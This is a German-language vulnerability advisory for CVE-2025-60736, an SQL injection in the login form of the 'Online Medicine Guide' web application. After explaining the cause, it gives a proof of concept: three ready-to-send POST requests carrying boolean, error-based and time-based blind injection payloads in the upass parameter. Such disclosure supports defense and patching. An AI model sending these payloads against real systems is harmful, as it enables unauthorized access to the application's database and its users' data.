CVE-2025-60736: SQL-Injection-Schwachstelle im Online Medicine Guide
Zusammenfassung
Dieses Dokument beschreibt eine kritische SQL-Injection-Schwachstelle, die in der Webanwendung Online Medicine Guide entdeckt wurde. Die Schwachstelle ermöglicht unbefugten Datenbankzugriff und stellt ein erhebliches Sicherheitsrisiko für die Anwendung und ihre Benutzer dar.
Die Schwachstelle resultiert aus unzureichender Eingabevalidierung und -bereinigung in der Datei /login.php. Die Anwendung verkettet Benutzereingaben vom Parameter upass direkt in SQL-Abfragen, ohne ordnungsgemäße Bereinigung oder Prepared Statements.
Technische Ursache:
Direkte Zeichenfolgenverkettung in SQL-Abfragen
Fehlende Eingabevalidierung und -bereinigung
Fehlende Implementierung von Prepared Statements
Unzureichende Parameterbindung
3. Proof of Concept
Schwachstellenort
Datei: /login.php
Parameter: upass (POST)
Angriffsvektor: Manipulation von HTTP-POST-Anfragen
Ausnutzungsmethoden
Methode 1: Boolesche SQL-Injection
root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' OR NOT 1852=1852-- iPRx
Methode 1: Fehlerbasierte SQL-Injection
root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' AND EXTRACTVALUE(4672,CONCAT(0x5c,0x7176707071,(SELECT (ELT(4672=4672,1))),0x71717a7071))-- knKp
Methode 2: Zeitbasierte Blind-SQL-Injection
root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' AND (SELECT 2089 FROM (SELECT(SLEEP(5)))zUlY)-- mWfa